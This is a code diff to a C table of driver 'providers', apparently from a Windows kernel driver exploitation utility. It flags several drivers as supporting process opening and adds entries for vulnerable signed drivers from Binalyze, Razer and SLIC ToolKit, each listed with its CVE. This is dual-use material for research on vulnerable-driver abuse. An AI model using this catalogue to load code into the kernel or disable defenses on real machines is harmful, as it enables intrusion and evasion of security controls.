@@ -347,7 +347,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_DBK64,
KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_V4,
(LPWSTR)L"Cheat Engine Dbk64",
(LPWSTR)L"CEDRIVER73",
@@ -407,7 +407,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_ZEMANA,
KDU_VICTIM_PE1702,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_V4,
(LPWSTR)L"Zemana (CVE-2021-31728, CVE-2022-42045)",
(LPWSTR)L"ZemanaAntimalware",
@@ -617,7 +617,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_PROVIDER_ECHODRV,
KDU_VICTIM_PE1702,
SourceBaseNone,
- KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PREFER_VIRTUAL,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PREFER_VIRTUAL | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Echo AntiCheat",
(LPWSTR)L"EchoDrv",
@@ -638,6 +638,51 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"nvoclock",
(LPWSTR)L"NVR0Internal",
(LPWSTR)L"NVIDIA Corporation"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_IREC,
+ KDU_PROVIDER_BINALYZE_IREC,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
+ KDUPROV_SC_NONE,
+ (LPWSTR)L"Binalyze CVE-2023-41444",
+ (LPWSTR)L"IREC",
+ (LPWSTR)L"IREC",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_PHYDMACC,
+ KDU_PROVIDER_PHYDMACC,
+ KDU_VICTIM_PE1702,
+ SourceBaseWinRing0,
+ KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"SLIC ToolKit",
+ (LPWSTR)L"PhyDMACC",
+ (LPWSTR)L"PhyDMACC_1_2_0",
+ (LPWSTR)L"Suzhou Ind. Park ShiSuanKeJi Co., Ltd."
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_RZPNK,
+ KDU_PROVIDER_RAZER,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
+ KDUPROV_SC_NONE,
+ (LPWSTR)L"Razer Overlay Support driver CVE-2017-9769",
+ (LPWSTR)L"rzpnk",
+ (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
+ (LPWSTR)L"Razer USA Ltd."
}
};